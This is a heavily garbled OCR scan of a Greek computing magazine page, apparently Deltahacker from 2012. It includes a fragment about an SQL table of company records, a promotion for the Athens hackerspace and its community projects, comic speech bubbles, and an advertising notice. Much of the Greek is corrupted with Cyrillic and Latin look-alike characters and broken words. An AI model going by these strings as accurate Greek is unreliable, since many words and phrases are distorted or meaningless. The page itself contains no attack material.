711 Rent A Car 
Abu Dhabi Classi... 


О пімакас µε όλες τις εταιρεἰες και ra στοιχεία τους, δεν εἶναι καθόλου 
μικρός. Όπως µε πληροφορεί η SQL, περιέχει 338.348 εγγραφὲς. Μάλλον 
αυτός που τον ζήτησε, ἠξερε поло кала τι ἠθελε... 


Όπως ακριβώς 
μοιραζόμαστε 
τον κώδικά µας, 


У έτσι θέλουμε να 
μοιραστούμε και 

— τις Ιδέες uac! 

hack Γιατί λοιπόν να 
ας егѕрасе.ог μην To κάνουμε 
Αμπατιέλου 11, Αθήνα б с. 
πλησίον ΗΣΑΠ Αγ. Ελευθέριος опо κοντα; 


Ebooks Python UnitedTransnation 


Unauthorized Hackathons 
Awmn  SoftworeFreedomDay 


OpenLibrary  MozilloGreece 
Melissi Fedora Hackfests 
Arduino BookCrossing 
Hellug SysAdmin OpenGarden 
OpenDota Aeroponics үру 

CreotiveCommons 


Μάθε περισσότερα για то hsor, το Πρόγραμμα Εκδηλώσεων 
και πως μπορείς και εσύ να συμμετέχεις: роса сосе pr 


(t 
€/MAI O Ad ez. f “EIMAI TO РС TOY. 
AYTO Ε/ΝΑ/ TO РС МОУ. КУ R| 4Yroz EINAI HAIGIOZ" 


KOMMATIA 
eriwA | 
NAAI ΧΘΕΣ... JEN ZEPO 
JEN Ξερο NOZ RAN AN 
CYP/ZA, AEN | тамеоєд... 
EEPO ZE 70/0w 
MAATA.. 


"φον ZE a 7 TIA ма 
XAAAEI.. | EXO KATI 
LIATI TO \ Q WA OYMAMA! 


КАМЕГТЕ КАФЕ 
Φορ, 


03-03-20!2 WWW .LAKISER COM 


Н διαφήμισή σας ба 
μπορούσε ма εἶναι εδώ. 


Θα μπορούσε va "мат και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν &ivai. 


Προς το παρόν. 


niveis µας = E DOUME за ΞΕΡΕΤΕ ы 
СЕ POUE m ξέρετε « лыах va κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2usQdeltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (3) 
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